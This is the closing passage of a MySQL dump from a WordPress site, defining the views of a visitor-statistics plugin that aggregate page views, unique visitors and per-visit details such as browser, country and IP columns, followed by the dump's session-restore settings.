/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthWisePageViews`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWisePageViews`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthWisePageViews` AS select date_format(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') AS `recordMonth`,sum(`wp_wsm_pageViews`.`totalViews`) AS `pageViews` from `wp_wsm_pageViews` group by date_format(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthWiseVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthWiseVisitors` AS select date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') AS `recordMonth`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` group by date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthwisevisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthwisevisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthwisevisitors` AS select date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') AS `recordMonth`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` group by date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_pageViews`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_pageViews`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_pageViews` AS select `LV`.`visitId` AS `visitId`,`LV`.`URLId` AS `URLId`,`LV`.`keyword` AS `keyword`,`LV`.`refererUrlId` AS `refererUrlId`,`LU`.`countryId` AS `countryId`,`LU`.`regionId` AS `regionId`,count(0) AS `totalViews`,max(`LV`.`serverTime`) AS `visitLastActionTime` from (`wp_wsm_logVisit` `LV` left join `wp_wsm_logUniqueVisit` `LU` on((`LV`.`visitId` = `LU`.`id`))) group by `LV`.`visitId`,`LV`.`URLId` */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_pageviews`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_pageviews`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_pageviews` AS select `lv`.`visitId` AS `visitId`,`lv`.`URLId` AS `URLId`,`lv`.`keyword` AS `keyword`,`lv`.`refererUrlId` AS `refererUrlId`,`lu`.`countryId` AS `countryId`,`lu`.`regionId` AS `regionId`,count(0) AS `totalViews`,max(`lv`.`serverTime`) AS `visitLastActionTime` from (`wp_wsm_logVisit` `lv` left join `wp_wsm_logUniqueVisit` `lu` on((`lv`.`visitId` = `lu`.`id`))) group by `lv`.`visitId`,`lv`.`URLId` */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_uniqueVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_uniqueVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_uniqueVisitors` AS select `LU`.`id` AS `id`,`LU`.`visitorId` AS `visitorId`,sum(`LU`.`totalTimeVisit`) AS `totalTimeVisit`,min(`LV`.`serverTime`) AS `firstVisitTime`,`LU`.`refererUrlId` AS `refererUrlId` from (`wp_wsm_logUniqueVisit` `LU` left join `wp_wsm_logVisit` `LV` on((`LV`.`visitId` = `LU`.`id`))) group by `LU`.`visitorId` */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_uniquevisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_uniquevisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_uniquevisitors` AS select `lu`.`id` AS `id`,`lu`.`visitorId` AS `visitorId`,sum(`lu`.`totalTimeVisit`) AS `totalTimeVisit`,min(`lv`.`serverTime`) AS `firstVisitTime`,`lu`.`refererUrlId` AS `refererUrlId` from (`wp_wsm_logUniqueVisit` `lu` left join `wp_wsm_logVisit` `lv` on((`lv`.`visitId` = `lu`.`id`))) group by `lu`.`visitorId` */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_visitorInfo`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_visitorInfo`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_visitorInfo` AS select `LV`.`visitId` AS `visitId`,`LU`.`userId` AS `userId`,`LV`.`serverTime` AS `serverTime`,`LU`.`visitLastActionTime` AS `visitLastActionTime`,`LV`.`URLId` AS `urlId`,count(`LV`.`URLId`) AS `hits`,`UL`.`title` AS `title`,concat(`UL`.`protocol`,`UL`.`url`) AS `url`,concat(`UL2`.`protocol`,`UL2`.`url`) AS `refUrl`,`LU`.`visitorId` AS `visitorId`,`LU`.`ipAddress` AS `ipAddress`,`LU`.`city` AS `city`,`C`.`alpha2Code` AS `alpha2Code`,`C`.`name` AS `country`,`LU`.`deviceType` AS `deviceType`,`B`.`name` AS `browser`,`OS`.`name` AS `osystem`,`LU`.`latitude` AS `latitude`,`LU`.`longitude` AS `longitude`,`R`.`name` AS `resolution`,`SE`.`name` AS `searchEngine`,`TB`.`name` AS `toolBar` from (((((((((`wp_wsm_logVisit` `LV` left join `wp_wsm_logUniqueVisit` `LU` on((`LU`.`id` = `LV`.`visitId`))) left join `wp_wsm_countries` `C` on((`C`.`id` = `LU`.`countryId`))) left join `wp_wsm_browsers` `B` on((`B`.`id` = `LU`.`browserId`))) left join `wp_wsm_resolutions` `R` on((`R`.`id` = `LU`.`resolutionId`))) left join `wp_wsm_url_log` `UL` on((`LV`.`URLId` = `UL`.`id`))) left join `wp_wsm_url_log` `UL2` on((`LV`.`refererUrlId` = `UL2`.`id`))) left join `wp_wsm_searchEngines` `SE` on((`SE`.`id` = `UL`.`searchEngine`))) left join `wp_wsm_toolBars` `TB` on((`TB`.`id` = `UL`.`toolBar`))) left join `wp_wsm_oSystems` `OS` on((`OS`.`id` = `LU`.`oSystemId`))) group by `LV`.`visitId`,`LV`.`URLId` order by `LV`.`visitId` desc,`LV`.`serverTime` desc */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_visitorinfo`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_visitorinfo`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_visitorinfo` AS select `lv`.`visitId` AS `visitId`,`lu`.`userId` AS `userId`,`lv`.`serverTime` AS `serverTime`,`lu`.`visitLastActionTime` AS `visitLastActionTime`,`lv`.`URLId` AS `urlId`,count(`lv`.`URLId`) AS `hits`,`ul`.`title` AS `title`,concat(`ul`.`protocol`,`ul`.`url`) AS `url`,concat(`ul2`.`protocol`,`ul2`.`url`) AS `refUrl`,`lu`.`visitorId` AS `visitorId`,`lu`.`ipAddress` AS `ipAddress`,`lu`.`city` AS `city`,`c`.`alpha2Code` AS `alpha2Code`,`c`.`name` AS `country`,`lu`.`deviceType` AS `deviceType`,`b`.`name` AS `browser`,`os`.`name` AS `osystem`,`lu`.`latitude` AS `latitude`,`lu`.`longitude` AS `longitude`,`r`.`name` AS `resolution`,`se`.`name` AS `searchEngine`,`tb`.`name` AS `toolBar` from (((((((((`wp_wsm_logVisit` `lv` left join `wp_wsm_logUniqueVisit` `lu` on((`lu`.`id` = `lv`.`visitId`))) left join `wp_wsm_countries` `c` on((`c`.`id` = `lu`.`countryId`))) left join `wp_wsm_browsers` `b` on((`b`.`id` = `lu`.`browserId`))) left join `wp_wsm_resolutions` `r` on((`r`.`id` = `lu`.`resolutionId`))) left join `wp_wsm_url_log` `ul` on((`lv`.`URLId` = `ul`.`id`))) left join `wp_wsm_url_log` `ul2` on((`lv`.`refererUrlId` = `ul2`.`id`))) left join `wp_wsm_searchEngines` `se` on((`se`.`id` = `ul`.`searchEngine`))) left join `wp_wsm_toolBars` `tb` on((`tb`.`id` = `ul`.`toolBar`))) left join `wp_wsm_oSystems` `os` on((`os`.`id` = `lu`.`oSystemId`))) group by `lv`.`visitId`,`lv`.`URLId` order by `lv`.`visitId` desc,`lv`.`serverTime` desc */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-06-22  8:29:34
